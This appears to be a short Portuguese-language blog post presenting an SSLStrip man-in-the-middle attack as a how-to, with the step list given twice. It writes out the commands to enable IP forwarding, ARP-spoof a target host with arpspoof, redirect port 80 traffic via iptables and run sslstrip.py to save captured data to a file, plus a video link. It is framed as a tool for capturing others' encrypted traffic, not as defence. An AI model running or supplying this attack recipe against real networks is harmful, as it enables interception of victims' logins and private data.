A partir da Aparição de um SSLStrip (nao me lembro quem fez) muitos sequelas firam na paranoia , que tem um fundamento pelo poder dessa simplória porem muito interessante tool , que captura Seu Trafego SSL tranquilamente.
Resumidamente, os passos seriam:
Configurar o IP Forwarding:
Realizar um ataque ARP MITM entre as 2 máquinas:
Redirecionar o tráfego com iptables:
Iniciar o SSLStrip, definindo um arquivo onde armazenará os dados capturados:
Quem quiser dar uma olhada no video :
http://www.youtube.com/watch?v=TJHcfs4inhs
Resumidamente, os passos seriam:
Configurar o IP Forwarding:
- CÓDIGO:
# echo 1 > /proc/sys/net/ipv4/ip_forward
Realizar um ataque ARP MITM entre as 2 máquinas:
- CÓDIGO:
# arpspoof -i eth0 -t HOST_ALVO
Redirecionar o tráfego com iptables:
- CÓDIGO:
# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
Iniciar o SSLStrip, definindo um arquivo onde armazenará os dados capturados:
- CÓDIGO:
# python sslstrip.py -w arquivo
Quem quiser dar uma olhada no video :
http://www.youtube.com/watch?v=TJHcfs4inhs
E MITM ?
[]'s ;
0 comentários:
Postar um comentário